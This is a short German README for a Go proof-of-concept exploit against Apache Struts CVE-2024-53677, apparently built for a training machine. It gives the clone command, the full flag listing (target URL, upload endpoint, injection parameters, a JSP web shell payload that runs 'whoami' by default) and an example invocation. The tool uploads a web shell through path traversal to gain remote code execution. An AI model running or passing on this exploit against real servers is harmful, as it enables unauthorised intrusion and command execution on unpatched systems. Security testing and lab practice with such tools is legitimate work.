
ein Proof-of-Concept für CVE-2024-53677
Eine nette alte Schwachstelle, die Apache Struts betrifft und zu LFI sowie Remote-Ausführung führt.
Apache Struts path traversal → RCE (CVE-2024-53677)
Ich habe viel Zeit darauf verwendet, dies so anpassbar wie möglich zu machen, denn als ich zum ersten Mal auf diese CVE stieß, fand ich keine gute Quelle, die sie korrekt implementiert hat. Die meisten Flags haben Standardwerte, also lassen Sie sich nicht von all diesen Flags entmutigen.
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd CVE-2024-53677-POC
go run . -h
-command string
command to execute on the server default: whoami
-end-point string
post endpoint default to: upload.action
-file-location string
where to save the file into the server default: what test function return
-lfi-param string
Parameter name for LFI testing default: top.UploadFileName
-payload-file string
Path to the payload file default: ./shell.jsp
-payload-file-name string
name of the payload it self default: shell.jsp
-payload-param string
Parameter name for payload injection default: Upload
-test-file-name string
name of the testfile it self default: testfile.txt
-testing-file string
File used for testing default: ./testfile.txt
-url string
Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
Alle diese Befehle haben Standardwerte. Ich habe auch eine Testfunktion implementiert, um zu überprüfen, wo die Datei abgelegt werden soll, und sie ist ebenfalls eine benutzerkonfigurierbare Option.
go run . -url http://127.0.0.1:8080/ -end-point upload.action
Einige Dinge, die zu beachten sind.
Sie können den Exploit gerne modifizieren oder erweitern ♥️.